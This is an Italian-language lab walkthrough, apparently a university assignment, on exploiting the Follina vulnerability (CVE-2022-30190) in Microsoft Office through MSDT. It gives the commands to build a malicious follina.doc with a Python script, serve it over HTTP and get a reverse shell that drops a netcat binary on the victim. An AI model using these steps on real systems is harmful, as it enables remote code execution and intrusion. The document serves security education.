
Follina (CVE-2022-30190) è una vulnerabilità zero-day di Microsoft Office scoperta di recente. È una vulnerabilità ad alta gravità che gli hacker possono sfruttare per attacchi di esecuzione remota di codice (RCE).
Amine TITROFINE | 17 dicembre 2022
Follina (CVE-2022-30190) è una vulnerabilità zero-day di Microsoft Office scoperta di recente. È una vulnerabilità ad alta gravità che gli hacker possono sfruttare per attacchi di esecuzione remota di codice (RCE). Si manifesta quando MSDT viene chiamato utilizzando il protocollo URL da un'applicazione chiamante come Word. Un attaccante che sfrutta con successo questa vulnerabilità può eseguire codice arbitrario con i privilegi dell'applicazione chiamante. L'attaccante può quindi installare programmi, visualizzare, modificare o eliminare dati, o creare nuovi account nel contesto consentito dai diritti dell'utente.
2 VM:
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
Dopo aver eseguito il programma follina.py, apparirà un file ( follina.doc ) che contiene uno script malevolo.
Per facilitare la condivisione di file tra le due VM, useremo un server HTTP Python
$ python3 –m http.server 8080
Ottieni una reverse shell sulla porta 9999. Nota: questo scarica un binario netcat sulla vittima e lo inserisce in C:\Windows\Tasks. Non pulisce il binario. Questo attiverà le rilevazioni antivirus a meno che l'antivirus non sia disabilitato.
$ python3 follina.py -r 9999
Esegui calc.exe:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Esegui notepad.exe:
$ python3 follina.py -c "notepad"